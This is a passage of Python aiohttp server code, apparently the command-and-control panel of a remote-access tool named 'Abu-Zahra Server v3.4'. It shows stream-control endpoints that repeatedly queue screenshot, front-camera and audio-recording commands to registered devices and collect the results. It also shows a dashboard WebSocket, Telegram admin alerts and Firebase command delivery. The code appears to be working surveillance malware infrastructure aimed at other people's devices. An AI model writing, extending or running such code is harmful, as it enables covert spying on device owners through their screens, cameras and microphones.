   660→  5159→                    "stream_id": dinfo.get("stream_id", ""),
   661→  5160→                    "last_activity": dinfo.get("last_activity", 0),
   662→  5161→                    "has_video_frame": f"{did}:video" in _latest_frames or f"{did}:video" in _latest_frames_module,
   663→  5162→                    "has_audio_chunk": f"{did}:audio" in _latest_audio,
   664→  5163→                }
   665→  5164→        # Also report JPEG screenshot streams
   666→  5165→        for did, info in _jpeg_stream_info.items():
   667→  5166→            if info.get("active"):
   668→  5167→                active[did] = {
   669→  5168→                    "stream_id": did,
   670→  5169→                    "last_activity": info.get("last_frame_time", 0),
   671→  5170→                    "has_video_frame": f"{did}:video" in _latest_frames_module,
   672→  5171→                    "has_audio_chunk": False,
   673→  5172→                    "jpeg_stream": True,
   674→  5173→                }
   675→  5174→        return web.json_response({"ok": True, "active_streams": active, "total": len(active)})
   676→  5175→
   677→  5176→    async def _jpeg_stream_loop(device_id, stream_type, interval):
   678→  5177→        """Background task that queues screenshot/camera commands at regular intervals."""
   679→  5178→        import asyncio
   680→  5179→        cmd_map = {
   681→  5180→            "screen": "screenshot",
   682→  5181→            "camera": "front_camera",
   683→  5182→            "audio": "record_audio",
   684→  5183→        }
   685→  5184→        cmd = cmd_map.get(stream_type, "screenshot")
   686→  5185→        log.info("JPEG stream loop started: device=%s type=%s cmd=%s interval=%ds", device_id, stream_type, cmd, interval)
   687→  5186→        try:
   688→  5187→            while device_id in _jpeg_stream_info and _jpeg_stream_info[device_id].get("active"):
   689→  5188→                # Queue the capture command
   690→  5189→                await queue_command(device_id, cmd)
   691→  5190→                _jpeg_stream_info[device_id]["last_command_time"] = time.time()
   692→  5191→                log.debug("JPEG stream: queued '%s' for %s", cmd, device_id)
   693→  5192→                # Wait for interval (check every second so we can stop promptly)
   694→  5193→                for _ in range(interval):
   695→  5194→                    if device_id not in _jpeg_stream_info or not _jpeg_stream_info[device_id].get("active"):
   696→  5195→                        break
   697→  5196→                    await asyncio.sleep(1)
   698→  5197→        except asyncio.CancelledError:
   699→  5198→            pass
   700→  5199→        except Exception as e:
   701→  5200→            log.error("JPEG stream loop error for %s: %s", device_id, e)
   702→  5201→        finally:
   703→  5202→            log.info("JPEG stream loop ended: device=%s", device_id)
   704→  5203→
   705→  5204→    @require_auth
   706→  5205→    async def api_jpeg_stream_start(request):
   707→  5206→        """POST /api/stream/jpeg_start - Start JPEG screenshot streaming for a device."""
   708→  5207→        global api_hits
   709→  5208→        api_hits += 1
   710→  5209→        try:
   711→  5210→            body = await request.json()
   712→  5211→            device_id = body.get("device_id", "")
   713→  5212→            stream_type = body.get("type", "screen")
   714→  5213→            interval = body.get("interval", 3)
   715→  5214→
   716→  5215→            if not device_id:
   717→  5216→                return web.json_response({"ok": False, "error": "device_id required"}, status=400)
   718→  5217→
   719→  5218→            d = find_device(device_id)
   720→  5219→            if not d:
   721→  5220→                return web.json_response({"ok": False, "error": "Device not found"}, status=404)
   722→  5221→
   723→  5222→            # Stop existing stream for this device if any
   724→  5223→            if device_id in _jpeg_stream_info and _jpeg_stream_info[device_id].get("active"):
   725→  5224→                _jpeg_stream_info[device_id]["active"] = False
   726→  5225→                task = _jpeg_stream_tasks_module.get(device_id)
   727→  5226→                if task and not task.done():
   728→  5227→                    task.cancel()
   729→  5228→
   730→  5229→            # Set up stream info
   731→  5230→            _jpeg_stream_info[device_id] = {
   732→  5231→                "active": True,
   733→  5232→                "type": stream_type,
   734→  5233→                "interval": interval,
   735→  5234→                "started_at": time.time(),
   736→  5235→                "last_command_time": 0,
   737→  5236→                "last_frame_time": 0,
   738→  5237→                "frame_count": 0,
   739→  5238→            }
   740→  5239→
   741→  5240→            # Send the first screenshot command immediately
   742→  5241→            cmd_map = {"screen": "screenshot", "camera": "front_camera", "audio": "record_audio"}
   743→  5242→            await queue_command(device_id, cmd_map.get(stream_type, "screenshot"))
   744→  5243→
   745→  5244→            # Start background loop
   746→  5245→            task = asyncio.create_task(_jpeg_stream_loop(device_id, stream_type, interval))
   747→  5246→            _jpeg_stream_tasks_module[device_id] = task
   748→  5247→
   749→  5248→            await update_device(device_id, {"streaming": True})
   750→  5249→            append_event("JPEG stream started", {"device_id": device_id, "type": stream_type})
   751→  5250→            log.info("JPEG stream started: device=%s type=%s interval=%ds", device_id, stream_type, interval)
   752→  5251→
   753→  5252→            return web.json_response({"ok": True, "message": f"JPEG streaming started ({stream_type})"})
   754→  5253→        except Exception as exc:
   755→  5254→            log.error("jpeg_stream_start error: %s", exc)
   756→  5255→            return web.json_response({"ok": False, "error": "Internal server error"}, status=500)
   757→  5256→
   758→  5257→    @require_auth
   759→  5258→    async def api_jpeg_stream_stop(request):
   760→  5259→        """POST /api/stream/jpeg_stop - Stop JPEG screenshot streaming for a device."""
   761→  5260→        global api_hits
   762→  5261→        api_hits += 1
   763→  5262→        try:
   764→  5263→            body = await request.json()
   765→  5264→            device_id = body.get("device_id", "")
   766→  5265→
   767→  5266→            if not device_id:
   768→  5267→                return web.json_response({"ok": False, "error": "device_id required"}, status=400)
   769→  5268→
   770→  5269→            info = _jpeg_stream_info.get(device_id)
   771→  5270→            stream_type_saved = info.get("type", "") if info else ""
   772→  5271→            if info:
   773→  5272→                info["active"] = False
   774→  5273→                task = _jpeg_stream_tasks_module.get(device_id)
   775→  5274→                if task and not task.done():
   776→  5275→                    task.cancel()
   777→  5276→                del _jpeg_stream_tasks_module[device_id]
   778→  5277→                del _jpeg_stream_info[device_id]
   779→  5278→
   780→  5279→            # Also queue stop commands if it was an audio stream
   781→  5280→            if stream_type_saved == "audio":
   782→  5281→                await queue_command(device_id, "stop_audio_stream")
   783→  5282→
   784→  5283→            await update_device(device_id, {"streaming": False})
   785→  5284→            # Clean cached frames
   786→  5285→            for key in list(_latest_frames_module.keys()):
   787→  5286→                if device_id in key:
   788→  5287→                    del _latest_frames_module[key]
   789→  5288→
   790→  5289→            append_event("JPEG stream stopped", {"device_id": device_id})
   791→  5290→            log.info("JPEG stream stopped: device=%s", device_id)
   792→  5291→
   793→  5292→            return web.json_response({"ok": True, "message": "JPEG streaming stopped"})
   794→  5293→        except Exception as exc:
   795→  5294→            log.error("jpeg_stream_stop error: %s", exc)
   796→  5295→            return web.json_response({"ok": False, "error": "Internal server error"}, status=500)
   797→  5296→
   798→  5297→    async def api_stream_start(request):
   799→  5298→        """POST /api/stream/start - Receive stream start notification from device"""
   800→  5299→        global api_hits
   801→  5300→        api_hits += 1
   802→  5301→        try:
   803→  5302→            body = await request.json()
   804→  5303→            device_id = body.get("device_id", "")
   805→  5304→            stream_id = body.get("stream_id", "")
   806→  5305→            stream_type = body.get("stream_type", "")
   807→  5306→            config = body.get("config", {})
   808→  5307→
   809→  5308→            # Validate device token
   810→  5309→            device_token = request.headers.get("X-Device-Token", "")
   811→  5310→            if not get_device_by_token(device_id, device_token):
   812→  5311→                return web.json_response({"ok": False, "error": "Unauthorized or device not found"}, status=401)
   813→  5312→
   814→  5313→            await update_device(device_id, {"streaming": True, "stream_id": stream_id, "stream_type": stream_type})
   815→  5314→            append_event("Stream started", {"device_id": device_id, "stream_id": stream_id, "type": stream_type})
   816→  5315→            log.info("Stream started: device=%s stream=%s type=%s", device_id, stream_id, stream_type)
   817→  5316→
   818→  5317→            return web.json_response({"ok": True})
   819→  5318→        except Exception as exc:
   820→  5319→            log.error("stream_start error: %s", exc)
   821→  5320→            return web.json_response({"ok": False, "error": "Internal server error"}, status=500)
   822→  5321→
   823→  5322→    async def api_stream_stop(request):
   824→  5323→        """POST /api/stream/stop - Receive stream stop notification from device"""
   825→  5324→        global api_hits
   826→  5325→        api_hits += 1
   827→  5326→        try:
   828→  5327→            body = await request.json()
   829→  5328→            device_id = body.get("device_id", "")
   830→  5329→            stream_id = body.get("stream_id", "")
   831→  5330→            duration = body.get("duration", 0)
   832→  5331→            bytes_sent = body.get("bytes_sent", 0)
   833→  5332→
   834→  5333→            # Validate device token
   835→  5334→            device_token = request.headers.get("X-Device-Token", "")
   836→  5335→            if not get_device_by_token(device_id, device_token):
   837→  5336→                return web.json_response({"ok": False, "error": "Unauthorized or device not found"}, status=401)
   838→  5337→
   839→  5338→            await update_device(device_id, {"streaming": False, "stream_id": ""})
   840→  5339→
   841→  5340→            # Clean up cached frames
   842→  5341→            for key in list(_latest_frames.keys()):
   843→  5342→                if device_id in key:
   844→  5343→                    del _latest_frames[key]
   845→  5344→            for key in list(_latest_audio.keys()):
   846→  5345→                if device_id in key:
   847→  5346→                    del _latest_audio[key]
   848→  5347→
   849→  5348→            append_event("Stream stopped", {"device_id": device_id, "stream_id": stream_id, "duration": duration, "bytes": bytes_sent})
   850→  5349→            log.info("Stream stopped: device=%s stream=%s duration=%dms", device_id, stream_id, duration)
   851→  5350→
   852→  5351→            return web.json_response({"ok": True})
   853→  5352→        except Exception as exc:
   854→  5353→            log.error("stream_stop error: %s", exc)
   855→  5354→            return web.json_response({"ok": False, "error": "Internal server error"}, status=500)
   856→  5355→
   857→  5356→    app.router.add_get("/ws/stream", ws_stream)
   858→  5357→    app.router.add_get("/ws/stream/viewer", ws_stream_viewer)
   859→  5358→    app.router.add_get("/api/stream/frame/{device_id}", api_stream_frame)
   860→  5359→    app.router.add_get("/api/stream/status", api_stream_status)
   861→  5360→    app.router.add_post("/api/stream/start", api_stream_start)
   862→  5361→    app.router.add_post("/api/stream/stop", api_stream_stop)
   863→  5362→    app.router.add_post("/api/stream/jpeg_start", api_jpeg_stream_start)
   864→  5363→    app.router.add_post("/api/stream/jpeg_stop", api_jpeg_stream_stop)
   865→  5364→
   866→  5365→    # ========== DASHBOARD WEBSOCKET (Real-time Updates) ==========
   867→  5366→    _dashboard_ws_clients = set()
   868→  5367→
   869→  5368→    async def ws_dashboard(request):
   870→  5369→        """WebSocket endpoint for dashboard real-time updates - /ws/dashboard?token=xxx"""
   871→  5370→        ws = web.WebSocketResponse(heartbeat=30)
   872→  5371→        await ws.prepare(request)
   873→  5372→
   874→  5373→        # Authenticate via query param
   875→  5374→        token = request.query.get("token", "")
   876→  5375→        if not token or not validate_session(token):
   877→  5376→            await ws.close(code=4001, message="Unauthorized")
   878→  5377→            return ws
   879→  5378→
   880→  5379→        _dashboard_ws_clients.add(ws)
   881→  5380→        log.info("Dashboard WebSocket connected (total: %d)", len(_dashboard_ws_clients))
   882→  5381→        try:
   883→  5382→            # Send initial data
   884→  5383→            devices = get_devices()
   885→  5384→            cmds = load_json(COMMANDS_FILE, [])[-50:]
   886→  5385→            events = load_json(EVENTS_FILE, [])[-50:]
   887→  5386→            online = sum(1 for d in devices if d.get("active"))
   888→  5387→            pending = sum(1 for c in cmds if c.get("status") == "pending")
   889→  5388→            completed = sum(1 for c in cmds if c.get("status") == "completed")
   890→  5389→            initial = {
   891→  5390→                "type": "init",
   892→  5391→                "devices": devices,
   893→  5392→                "commands": cmds,
   894→  5393→                "events": events,
   895→  5394→                "stats": {
   896→  5395→                    "uptime": get_uptime(),
   897→  5396→                    "uptime_formatted": format_uptime(get_uptime()),
   898→  5397→                    "devices_total": len(devices),
   899→  5398→                    "devices_online": online,
   900→  5399→                    "commands_total": len(cmds),
   901→  5400→                    "commands_pending": pending,
   902→  5401→                    "commands_completed": completed,
   903→  5402→                    "messages_sent": messages_sent,
   904→  5403→                    "api_hits": api_hits,
   905→  5404→                    "events_total": len(events),
   906→  5405→                    "total_registered_commands": len(COMMAND_REGISTRY),
   907→  5406→                }
   908→  5407→            }
   909→  5408→            await ws.send_json(initial)
   910→  5409→
   911→  5410→            # Keep connection alive with periodic updates
   912→  5411→            async for msg in ws:
   913→  5412→                if msg.type == aiohttp.WSMsgType.TEXT:
   914→  5413→                    if msg.data == "ping":
   915→  5414→                        await ws.send_json({"type": "pong"})
   916→  5415→                elif msg.type in (aiohttp.WSMsgType.ERROR, aiohttp.WSMsgType.CLOSE):
   917→  5416→                    break
   918→  5417→        except Exception as exc:
   919→  5418→            log.debug("Dashboard WS error: %s", exc)
   920→  5419→        finally:
   921→  5420→            _dashboard_ws_clients.discard(ws)
   922→  5421→            log.info("Dashboard WebSocket disconnected (total: %d)", len(_dashboard_ws_clients))
   923→  5422→
   924→  5423→        return ws
   925→  5424→
   926→  5425→    async def broadcast_to_dashboards(message):
   927→  5426→        """Send a message to all connected dashboard WebSocket clients."""
   928→  5427→        if not _dashboard_ws_clients:
   929→  5428→            return
   930→  5429→        dead = set()
   931→  5430→        msg_str = json.dumps(message) if not isinstance(message, str) else message
   932→  5431→        for ws_conn in list(_dashboard_ws_clients):
   933→  5432→            try:
   934→  5433→                await ws_conn.send_str(msg_str)
   935→  5434→            except Exception:
   936→  5435→                dead.add(ws_conn)
   937→  5436→        _dashboard_ws_clients.difference_update(dead)
   938→  5437→
   939→  5438→    async def dashboard_push_loop():
   940→  5439→        """Background task: periodically push stats updates to connected dashboards."""
   941→  5440→        while True:
   942→  5441→            await asyncio.sleep(4)
   943→  5442→            if not _dashboard_ws_clients:
   944→  5443→                continue
   945→  5444→            try:
   946→  5445→                devices = get_devices()
   947→  5446→                cmds = load_json(COMMANDS_FILE, [])
   948→  5447→                events = load_json(EVENTS_FILE, [])
   949→  5448→                online = sum(1 for d in devices if d.get("active"))
   950→  5449→                pending = sum(1 for c in cmds if c.get("status") == "pending")
   951→  5450→                completed = sum(1 for c in cmds if c.get("status") == "completed")
   952→  5451→                stats_msg = {
   953→  5452→                    "type": "stats_update",
   954→  5453→                    "stats": {
   955→  5454→                        "uptime": get_uptime(),
   956→  5455→                        "uptime_formatted": format_uptime(get_uptime()),
   957→  5456→                        "devices_total": len(devices),
   958→  5457→                        "devices_online": online,
   959→  5458→                        "commands_total": len(cmds),
   960→  5459→                        "commands_pending": pending,
   961→  5460→                        "commands_completed": completed,
   962→  5461→                        "messages_sent": messages_sent,
   963→  5462→                        "api_hits": api_hits,
   964→  5463→                        "events_total": len(events),
   965→  5464→                        "total_registered_commands": len(COMMAND_REGISTRY),
   966→  5465→                    }
   967→  5466→                }
   968→  5467→                await broadcast_to_dashboards(stats_msg)
   969→  5468→            except Exception:
   970→  5469→                pass
   971→  5470→
   972→  5471→    app.router.add_get("/ws/dashboard", ws_dashboard)
   973→  5472→    # Store refs for the startup hook
   974→  5473→    app["_dashboard_ws_clients"] = _dashboard_ws_clients
   975→  5474→    app["_broadcast_to_dashboards"] = broadcast_to_dashboards
   976→  5475→    app["_dashboard_push_loop"] = dashboard_push_loop
   977→  5476→
   978→  5477→    # Static files
   979→  5478→    static_dir = Path(__file__).parent / "static"
   980→  5479→    if static_dir.exists():
   981→  5480→        app.router.add_static("/static", static_dir)
   982→  5481→    
   983→  5482→    return app
   984→  5483→
   985→  5484→
   986→  5485→async def on_startup(app):
   987→  5486→    ensure_data_dir()
   988→  5487→    log.info("=" * 60)
   989→  5488→    log.info("Abu-Zahra Server v3.4 starting...")
   990→  5489→    log.info("Domain: %s", SERVER_DOMAIN)
   991→  5490→    log.info("Port: %d", SERVER_PORT)
   992→  5491→    log.info("Admin: %d", ADMIN_CHAT_ID)
   993→  5492→    log.info("Commands: %d", len(COMMAND_REGISTRY))
   994→  5493→    log.info("Firebase Secret: %s", "SET" if FIREBASE_DB_SECRET else "NOT SET")
   995→  5494→    log.info("=" * 60)
   996→  5495→
   997→  5496→    # Check Firebase connectivity at startup
   998→  5497→    await check_firebase_connectivity()
   999→  5498→    if not firebase_connected:
  1000→  5499→        log.warning("Firebase not reachable - running in LOCAL-ONLY mode (commands via REST API only)")
  1001→  5500→    else:
  1002→  5501→        log.info("Firebase connected - commands will be pushed to Firebase RTDB")
  1003→  5502→
  1004→  5503→    # Start Telegram polling in background
  1005→  5504→    app["tg_task"] = asyncio.create_task(tg_poll_loop())
  1006→  5505→    # Start session cleanup
  1007→  5506→    app["cleanup_task"] = asyncio.create_task(session_cleanup_loop())
  1008→  5507→    # Start Firebase result listener
  1009→  5508→    app["fb_listener_task"] = asyncio.create_task(firebase_result_listener())
  1010→  5509→    # Start device monitoring (online/offline alerts)
  1011→  5510→    app["monitor_task"] = asyncio.create_task(device_monitoring_loop())
  1012→  5511→    # Start dashboard WebSocket push loop
  1013→  5512→    if app.get("_dashboard_push_loop"):
  1014→  5513→        app["dashboard_push_task"] = asyncio.create_task(app["_dashboard_push_loop"]())
  1015→  5514→    
  1016→  5515→    # Notify admin
  1017→  5516→    try:
  1018→  5517→        await send_admin(
  1019→  5518→            f"🟥 <b>Abu-Zahra Server v3.4</b> started!\n\n"
  1020→  5519→            f"📡 Port: <code>{SERVER_PORT}</code>\n"
  1021→  5520→            f"🌐 Domain: <code>{SERVER_DOMAIN}</code>\n"
  1022→  5521→            f"📋 Commands: <code>{len(COMMAND_REGISTRY)}</code>\n"
  1023→  5522→            f"📱 Web: <code>{SERVER_DOMAIN}/dashboard</code>"
  1024→  5523→        )
  1025→  5524→    except Exception:
  1026→  5525→        pass
  1027→  5526→
  1028→  5527→
  1029→  5528→async def on_cleanup(app):
  1030→  5529→    global polling_active
  1031→  5530→    polling_active = False
  1032→  5531→    if "tg_task" in app:
  1033→  5532→        app["tg_task"].cancel()
  1034→  5533→    if "cleanup_task" in app:
  1035→  5534→        app["cleanup_task"].cancel()
  1036→  5535→    if "fb_listener_task" in app:
  1037→  5536→        app["fb_listener_task"].cancel()
  1038→  5537→    if "monitor_task" in app:
  1039→  5538→        app["monitor_task"].cancel()
  1040→  5539→    global _tg_session
  1041→  5540→    if _tg_session and not _tg_session.closed:
  1042→  5541→        await _tg_session.close()
  1043→  5542→
  1044→  5543→
  1045→  5544→def main():
  1046→  5545→    app = create_app()
  1047→  5546→    app.on_startup.append(on_startup)
  1048→  5547→    app.on_cleanup.append(on_cleanup)
  1049→  5548→    
  1050→  5549→    log.info("Starting server on port %d...", SERVER_PORT)
  1051→  5550→    web.run_app(app, host="0.0.0.0", port=SERVER_PORT, print=None)
  1052→  5551→
  1053→  5552→
  1054→  5553→if __name__ == "__main__":
  1055→  5554→    main()
  1056→  5555→